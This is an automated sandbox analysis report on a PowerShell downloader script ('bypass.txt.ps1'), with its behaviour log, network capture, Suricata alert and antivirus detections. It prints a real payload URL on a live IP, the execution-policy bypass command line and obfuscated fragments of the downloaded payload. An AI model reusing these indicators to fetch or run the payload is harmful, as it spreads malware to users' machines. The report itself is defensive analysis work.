Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 29, 2021, 6:32 p.m.	Oct. 29, 2021, 6:35 p.m.

Size	5.1KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`529abb09970a8b6464375da0613893ea`
SHA256	`44ddcffc7bbf62fce8274c35ef7e05e56e2a884fbbbe8e0a9022799a362868d5`
CRC32	`BE3EF4D4`
ssdeep	`96:g2+dz8qVsVulmO7UIO1mWO7UI3myA2+rz42+Jz2CHDuCXDWVsVt2NBPMN:IWAmVI8i`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\bypass.txt.ps1
756

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
52.150.26.35	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 52.150.26.35:80 -> 192.168.56.102:49178	2020482	ET WEB_CLIENT DRIVEBY GENERIC ShellExecute in Hex No Seps	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 29, 2021, 6:33 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (21 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 29, 2021, 6:32 p.m.	buffer: Invoke-Expression : Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW Oct. 29, 2021, 6:32 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\bypass.txt.ps1:4 char:18 console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 29, 2021, 6:32 p.m.	buffer: + Invoke-Expression <<<< $cc console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 29, 2021, 6:32 p.m.	buffer: + CategoryInfo : ParserError: ((:String) [Invoke-Expression], Par console_handle: 0x00000047	1	1
WriteConsoleW Oct. 29, 2021, 6:32 p.m.	buffer: seException console_handle: 0x00000053	1	1
WriteConsoleW Oct. 29, 2021, 6:32 p.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 29, 2021, 6:32 p.m.	buffer: vokeExpressionCommand console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: Set-Content : Could not find a part of the path 'C:\Users\Public\Run\Run.BAT'. console_handle: 0x0000001b	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\bypass.txt.ps1:16 char:12 console_handle: 0x00000027	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: + Set-Content <<<< -Path C:\Users\Public\Run\Run.BAT -Value $Content console_handle: 0x00000033	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: + CategoryInfo : ObjectNotFound: (C:\Users\Public\Run\Run.BAT:Str console_handle: 0x0000003f	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: ing) [Set-Content], DirectoryNotFoundException console_handle: 0x0000004b	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: + FullyQualifiedErrorId : GetContentWriterDirectoryNotFoundError,Microsoft console_handle: 0x00000057	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: .PowerShell.Commands.SetContentCommand console_handle: 0x00000063	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: Invoke-Expression : Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: At line:1 char:18 console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: + Invoke-Expression <<<< $RDTFYGUIHJODRGFHTGYJH console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: + CategoryInfo : ParserError: ((:String) [Invoke-Expression], Par console_handle: 0x00000047	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: seException console_handle: 0x00000053	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 29, 2021, 6:33 p.m.	buffer: vokeExpressionCommand console_handle: 0x0000006b	1	1

Uses Windows APIs to generate a cryptographic key (11 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 29, 2021, 6:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2021, 6:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2021, 6:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2021, 6:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2021, 6:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2021, 6:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2021, 6:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2021, 6:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2021, 6:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2021, 6:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2021, 6:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 29, 2021, 6:32 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://52.150.26.35/PE.txt

Performs some HTTP requests (1 event)

request

GET http://52.150.26.35/PE.txt

Allocates read-write-execute memory (usually to unpack itself) (33 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02219000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06270000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06270000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06271000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06272000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06273000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06274000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06275000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:32 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05471000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0221d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02689000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05488000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2021, 6:33 p.m.	process_identifier: 756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06276000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 29, 2021, 6:33 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (5 events)

Data received	E`1```4`2`27B9E`1```46FC8`````A7D9F`1```42A82`27BA1`1```4183B`D```````22894`````6`2187DA1`1```4`22895`````62A82`27BA1`1```4193B`D```````22894`````6`2197DA1`1```4`22895`````62A1E`22899`````62A52`2`38C8D`````17DA``1```4`21B7DA1`1```42A52`2`38CB3`````17DA``1```4`21C7DA1`1```42A42`2`37DA``1```4`21F`B7DA1`1```42A52`22899`````625`37D9E`1```4`46FAA`````62A56`22899`````625`37D9E`1```4`46A6F9D`````62A56`22894`````6`2147DA``1```4`2177DA1`1```42A3E`2`37DA``1```4`21A7DA1`1```42A76`27BA``1```43A`6``````7217`3``7`2A`27BA``1```46F3D`````A2A52`21D7DA1`1```4`2`38C91`````17DA``1```42A56`21F`97DA1`1```4`2`38CB5`````17DA``1```42A52`21E7DA1`1```4`2`38CB4`````17DA``1```42A1E`228AB`````62A22`2`328AA`````62A1E`228A``````62A22`2`3289D`````62A1E`228A1`````62A22`2`328AE`````62A1E`27BA1`1```42A32`27BA3`1```47388`````62A4A`27369`````A7DA3`1```4`2281B`````A2A3A`26F38`1```AD2`228C``````62A32`22`C```````6F26`1```A2A6A`22`CB``````6F26`1```A`2`32885`````6161E6F51`````A2A7E`22`CA``````6F26`1```A`2`32835`1```A2881`````6161A6F51`````A2A7A`339`C```````22`C3``````6F26`1```A2A`22`C2``````6F26`1```A2A1B3``2``27`1`````1````1116`A38`E``````2`E8`3````2817`````A`61758`A`67E1``````42818`````A32E528`3`````63A`6``````162819`````A``7E13`````4281A`````A39`5``````2838`````6DD`6``````26DD````````2863`````62868`````63A`6``````162819`````ADD`6``````26DD``````````7E12`````4281A`````A39`5``````282C`````6DD`6``````26DD``````````7E`E`````4281A`````A39`F``````2849`````639`5``````286F`````6DD`6``````26DD``````````7E`4`````4281A`````A39`5``````2828`````6DD`6``````26DD````````284F`````62849`````639`5``````2851`````6DD`6``````26DD``````````2812`````63A`A``````281E`````6281B`````6DD`6``````26DD````````2`8813````2817`````A2BD4```158````````33``194C```6`1`````1````57``156C```6`1`
Data received	E6B5F5F4261636B696E674669656C64``3C456E61626C65643E6B5F5F4261636B696E674669656C64``3C4973436F6E6E65637465643E6B5F5F4261636B696E674669656C64``3C4B65657`416C6976653E6B5F5F4261636B696E674669656C64``3C48656164657253697A653E6B5F5F4261636B696E674669656C64``3C41637469766174655`6F5F6E673E6B5F5F4261636B696E674669656C64``3C5`696E673E6B5F5F4261636B696E674669656C64``3C496E74657276616C3E6B5F5F4261636B696E674669656C64``3C4275666665723E6B5F5F4261636B696E674669656C64``3C4F66667365743E6B5F5F4261636B696E674669656C64``3C53736C436C69656E743E6B5F5F4261636B696E674669656C64``3C54637`436C69656E743E6B5F5F4261636B696E674669656C64``496E6E65724164644D617`4368696C64``496E6E657241646441727261794368696C64``68576E64``466C6F617444656E6F726D616C4F7`6572616E64``53656E64``417`7`656E64``526567697374727956616C75654B696E64``5265736F75726365446174614E6F74466F756E64``5265736F757263654E616D654E6F74466F756E64``4F626A6563744E616D654E6F74466F756E64``5265736F7572636554797`654E6F74466F756E64``5`726F6365647572654E6F74466F756E64``4F626A6563745`6174684E6F74466F756E64``4F7264696E616C4E6F74466F756E64``446C6C4E6F74466F756E64``43726D5`726F746F636F6C4E6F74466F756E64``53747265616D4D696E6976657273696F6E4E6F74466F756E64``456E7472795`6F696E744E6F74466F756E64``6D6574686F64``496C6C466F726D65645`617373776F7264``57726F6E675`617373776F7264``52657`6C616365``4E6F7453616D65446576696365``4E6F53756368446576696365``4E6F4D65646961496E446576696365``437265617465496E7374616E6365``736F75726365``65786974436F6465``7365745F4D6F6465``496E76616C6964526561644D6F6465``46696C654D6F6465``5`616464696E674D6F6465``456E74657244656275674D6F6465``4372797`746F53747265616D4D6F6465``436F6
Data received	38`-0`31`-0`-0`-0`-0`33`38`41`38`44`37`4-`4-`4-`4-`4-`45`-0`43`-0`3-`-0`-0`32`-0`31`39`-0`-0`-0`-0`-0`-0`32`-0`37`45`-0`-0`-0`-0`-0`-0`32`-0`32`41`-0`-0`-0`-0`-0`-0
Data received	45`-0`-0`-0`-0`-0`-0`32`-0`-0`32`-0`-0`-0`-0`-0`-0`35`38`4-`45`-0`45`31`37`-0`-0`32`-0`33`-0`-0`31`-0`-0`-0`-0`33`38`37`37`45`35`4-`4-`4-`4-`31`31`-0`41`31`37`31`31
Data received	2`38`32`37`-0`-0`-0`-0`-0`41`3-`4-`38`45`-0`-0`-0`-0`-0`41`-0`3-`-0`37`3-`4-`38`4-`-0`-0`-0`-0`-0`41`31`37`37`33`33`42`-0`-0`-0`-0`-0`41`-0`43`-0`38`-0`32`31`3-`-0`32`38`45`3-`39`3-`4-`39`-0`-0`-0`-0`-0`-0`41`-0`38`3-`4-`39`31`-0`-0`-0`-0`-0`41`-0`3-`32`38`42`42`-0`-0`-0`-0`-0`3-`-0`44`32`38`42`33`-0`31`-0`-0`-0`3-`-0`39`32`41`-0`-0`-0`-0`-0`-0`31`33`33`-0`-0`32`-0`-0`-0`32`-0`-0`-0`-0`-0`-0`32`31`-0`-0`-0`-0`31`31`31`34`32`41`-0`-0`-0`-0`31`33`33`-0`-0`32`-0`-0`-0`32`-0`-0`-0`-0`-0`-0`32`32`-0`-0`-0`-0`31`31`31`34`32`41`-0`-0`-0`-0`31`33`33`-0`-0`32`-0`-0`-0`32`-0`-0`-0`-0`-0`-0`32`31`-0`-0`-0`-0`31`31`31`34`32`41`-0`-0`-0`-0`31`33`33`-0`-0`32`-0`-0`-0`32`-0`-0`-0`-0`-0`-0`32`31`-0`-0`-0`-0`31`31`31`34`32`41`-0`-0`-0`-0`31`33`33`-0`-0`32`-0`-0`-0`32`-0`-0`-0`-0`-0`-0`32`32`-0`-0`-0`-0`31`31`31`34`32`41`-0`-0`-0`-0`31`33`33`-0`-0`32`-0`-0`-0`32`-0`-0`-0`-0`-0`-0`32`32`-0`-0`-0`-0`31`31`31`34`32`41`-0`-0`-0`-0`31`33`33`-0`-0`34`-0`-0`33`34`-0`-0`-0`-0`-0`-0`32`33`-0`-0`-0`-0`31`31`37`32`41`45`-0`34`-0`-0`37`-0`-0`41`-0`3-`3-`4-`39`32`-0`-0`-0`-0`-0`41`31`3-`33`45`31`31`-0`-0`-0`-0`-0`-0`31`38`38`44`32`35`-0`-0`-0`-0`-0`31`-0`42`-0`37`31`3-`31`37`39`43`-0`37`31`37`31`38`39`43`-0`37`32`41`31`38`38`44`32`35`-0`-0`-0`-0`-0`31`-0`43`-0`38`31`3-`31`37`39`43`-0`38`31`37`31`38`39`43`-0`38`32`41`31`33`33`-0`-0`34`-0`-0`33`34`-0`-0`-0`-0`-0`-0`32`33`-0`-0`-0`-0`31`31`37`32`45`32`-0`34`-0`-0`37`-0`-0`41`-0`3-`3-`4-`39`32`-0`-0`-0`-0`-0`41`31`3-`33`45`31`31`-0`-0`-0`-0`-0`-0`31`38`38`44`32`35`-0`-0`-0`-0`-0`31`-0`42`-0`37`31`3-`31`37`39`43`-0`37`31`37`31`38`39`43`-0`37`32`41`31`38`38`44`32`35`-0`-0`-0`-0`-0`31`-0`43`-0`38`31`3-`31`37`39`43`-0`38`31`37`31`38`39`43`-0`38`32`41`31`33`33`-0`-0`32`-0`-0`-0`32`-0`-0`-0`-0`-0`-0`32`32`-0`-0`-0`-0`31`31`31`34`32`41`-0`-0`-0`-0`31`33`33`-0`-0`32`-0`-0`-0`32`-0`-0`-0`-0`-0`-0`32`31`-0`-0`-0`-0`31`31`31`34`32`41`-0`-0`-0`-0`31`45`-0`32`32`38`31`41`-0`-0`-0`-0`-0`41`32`41`33`41`4-`45`-0`39`-0`-0`-0`-0`4-`45`-0`39`-0`31`-0`-0`3-`4-`34`-0`-0`-0`-0`-0`-0`41`32`41`-0`-0`32`41`4-`45`-0`39`-0`-0`-0`-0`3-`4-`38`41`-0`31`-0`-0`-0`3-`32`41`-0`-0`33`41`4-`45`-0`39`-0`-0`-0`-0`4-`45`-0`39`-0`31`-0`-0`3-`4-`33`37`-0`-0`-0`-0`-0`41`32`41`-0`-0`32`41`4-`45`-0`39`-0`-0`-0`-0`3-`4-`34`31`-0`-0`-0`-0`-0`41`32`41`-0`-0`33`41`4-`45`-0`39`-0`-0`-0`-0`4-`45`-0`39`-0`31`-0`-0`3-`4-`38`42`-0`31`-0`-0`-0`3-`32`41`-0`-0`32`41`4-`45`-0`39`-0`-0`-0`-0`3-`4-`38`45`-0`31`-0`-0`-0`3-`32`41`-0`-0`32`45`-0`-0`4-`45`-0`39`-0`-0`-0`-0`32`38`39`33`-0`-0`-0`-0`-0`41`32`41`32`41`4-`45`-0`39`-0`-0`-0`-0`3-`4-`38`32`-0`-0`-0`-0`-0`41`32`41`-0`-0`32`41`4-`45`-0`39`-0`-0`-0`-0`3-`4-`39`34`-0`-0`-0`-0`-0`41`32`41`-0`-0`31`45`-0`-0`32`38`39`4-`-0`-0`-0`-0`-0`3-`32`41`33`41`4-`45`-0`39`-0`-0`-0`-0`4-`45`-0`39`-0`31`-0`-0`3-`4-`39`35`-0`-0`-0`-0`-0`41`32`41`-0`-0`34`41`4-`45`-0`39`-0`-0`-0`-0`4-`45`-0`39`-0`31`-0`-0`4-`45`-0`39`-0`32`-0`-0`3-`4-`39`3-`-0`-0`-0`-0`-0`41`32`41`-0`-0`31`45`-0`-0`32`38`42`41`-0`-0`-0`-0`-0`3-`32`41`35`41`4-`45`-0`39`-0`-0`-0`-0`4-`45`-0`39`-0`31`-0`-0`4-`45`-0`39`-0`32`-0`-0`4-`45`-0`39`-0`33`-0`-0`3-`4-`39`-0`-0`-0`-0`-0`-0`41`32`41`-0`-0`32`41`4-`45`-0`39`-0`-0`-0`-0`3-`4-`39`37`-0`-0`-0`-0`-0`41`32`41`-0`-0`32`45`-0`-0`4-`45`-0`39`-0`-0`-0`-0`32`38`42`42`-0`-0`-0`-0`-0`3-`32`

Poweshell is sending data to a remote host (1 event)

Data sent

GET /PE.txt HTTP/1.1 Host: 52.150.26.35 Connection: Keep-Alive

Communicates with host for which no DNS query was performed (1 event)

host

52.150.26.35

File has been identified by 12 AntiVirus engines on VirusTotal as malicious (12 events)

FireEye	Trojan.Script.GenericKDZ.3517
Arcabit	Trojan.Script.Generic.DDBD
Cyren	PSH/Agent.CL
BitDefender	Trojan.Script.GenericKDZ.3517
MicroWorld-eScan	Trojan.Script.GenericKDZ.3517
Ad-Aware	Trojan.Script.GenericKDZ.3517
Emsisoft	Trojan.Script.GenericKDZ.3517 (B)
DrWeb	PowerShell.DownLoader.1457
MAX	malware (ai score=85)
GData	Trojan.Script.GenericKDZ.3517
ALYac	Trojan.Script.GenericKDZ.3517
Ikarus	Trojan.PS.Agent

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Oct. 29, 2021, 6:33 p.m.	buffer: GET /PE.txt HTTP/1.1 Host: 52.150.26.35 Connection: Keep-Alive socket: 1484 sent: 68	1	68	0

bypass.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All